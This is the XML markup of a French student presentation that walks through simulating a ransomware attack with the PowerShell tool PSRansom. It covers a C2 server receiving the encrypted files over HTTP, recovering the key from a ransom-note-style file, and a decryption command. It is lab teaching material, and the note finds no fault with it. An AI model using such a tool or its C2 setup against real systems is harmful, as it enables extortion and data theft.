                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D312B3E5-C36F-4A80-BB5D-D658B0E2DF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7459211" y="6442589"/>
            <a:ext cx="4114800" cy="288147"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Schola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00CF77"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du numéro de diapositive 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B88C7E9-4B1F-4873-8AA8-F1FF1DAF07DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du texte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB9647AB-0E94-8319-5B2A-6A52A732342B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442835" y="982897"/>
            <a:ext cx="9854847" cy="3757952"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>Dans le fichier déposé à la racine du répertoire "C:\Partage", on peut récupérer la clé de déchiffrement Lorsque l'attaque est réelle, ce fichier prend la forme d'une note de rançon où l'on va retrouver les informations pour contacter les cybercriminels et entrer en négociation, notamment au sujet du montant de la rançon dans le but d'obtenir la clé de déchiffrement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="inherit"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="inherit"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="inherit"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="inherit"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="inherit"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t> il ne reste plus qu'à déchiffrer les données avec cette commande:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>PSRansom.ps1 -d "C:\Partage" -k &lt;clé de déchiffrement&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 7" descr="Une image contenant texte, capture d’écran, Police, ligne&#10;&#10;Le contenu généré par l’IA peut être incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DDFC02C-514B-EBA6-5FC0-87C3EB2A3C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85413"/>
            <a:ext cx="6354062" cy="1381318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19363655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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{456B5980-B1F2-4604-A44E-86243A8352F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="558165"/>
            <a:ext cx="2271950" cy="424732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Conclusion </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du pied de page 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D312B3E5-C36F-4A80-BB5D-D658B0E2DF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7459211" y="6442589"/>
            <a:ext cx="4114800" cy="288147"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Schola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00CF77"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du numéro de diapositive 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B88C7E9-4B1F-4873-8AA8-F1FF1DAF07DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du texte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB9647AB-0E94-8319-5B2A-6A52A732342B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442835" y="982897"/>
            <a:ext cx="10017217" cy="5370701"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Grâce à PSRansom, on peut simuler facilement une attaque par ransomware et faire une démonstration en quelques minutes. Le fait que tout soit fait via PowerShell le rend multi-OS et ne nécessite pas d'installer de nombreuses dépendances.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Ce qui est intéressant dans le fonctionnement, c'est que ce sont les fichiers chiffrés qui sont transmis du serveur compromis vers le serveur C2, et ce dernier déchiffre les données en local.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Même s'il s'agit d'un flux HTTP les fichiers qui transitent sur le réseau sont chiffrés.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37082028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Printemps [Template]">
  <a:themeElements>
    <a:clrScheme name="Printemps">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="00CF77"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="00CF77"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FFFFFF"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="000000"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="00CF77"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="000000"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="FFFFFF"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00CF77"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="00864D"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Printemps">
      <a:majorFont>
        <a:latin typeface="Gilroy Medium"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Gilro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220331 0925 Printemps - MASQUE GROUPE.pptx" id="{5C0FFAB1-8168-4E13-9CEC-1E1BD37F8698}" vid="{5796D25B-1B34-4CA1-B43C-F4D598291304}"/>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1587</TotalTime>
  <Words>714</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>74</Paragraphs>
  <Slides>8</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8</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="18" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Gilroy</vt:lpstr>
      <vt:lpstr>inherit</vt:lpstr>
      <vt:lpstr>PT Sans</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Gilroy Light</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Gilroy ExtraBold</vt:lpstr>
      <vt:lpstr>Gilroy Bold</vt:lpstr>
      <vt:lpstr>Printemps [Template]</vt:lpstr>
      <vt:lpstr>  FICHE MISSION école   </vt:lpstr>
      <vt:lpstr>SOMMAIRE</vt:lpstr>
      <vt:lpstr>Présentation </vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Déployer le serveur c2</vt:lpstr>
      <vt:lpstr>Simuler l’attaque par ransomware </vt:lpstr>
      <vt:lpstr>Restaurer les données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AOUISSI Thinhinane</dc:creator>
  <cp:lastModifiedBy>AOUISSI Thinhinane</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2022-03-28T15:00:38Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-23T12:20:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-24T14:48:15Z</dcterms:modified>
</cp:coreProperties>
</file>